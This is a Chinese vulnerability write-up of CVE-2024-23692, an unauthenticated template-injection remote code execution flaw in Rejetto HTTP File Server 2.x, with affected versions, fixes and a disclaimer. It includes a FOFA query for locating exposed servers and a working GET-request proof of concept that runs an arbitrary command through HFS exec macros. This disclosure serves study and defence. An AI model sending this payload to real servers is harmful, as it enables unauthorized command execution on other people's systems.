文章目录
- CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响版本
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
- 0x06 修复建议
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
0x03 影响版本
Rejetto HTTP File Server <= 2.3
0x04 漏洞环境
FOFA语法:app=“HFS”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (GET)
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
3.复现
0x06 修复建议
- 关闭互联网暴露面设置访问权限或白名单访问
- 由于Rejetto HTTP File Server 2.x已经不再支持,建议升级至Rejetto HTTP File Server 3.x 系列。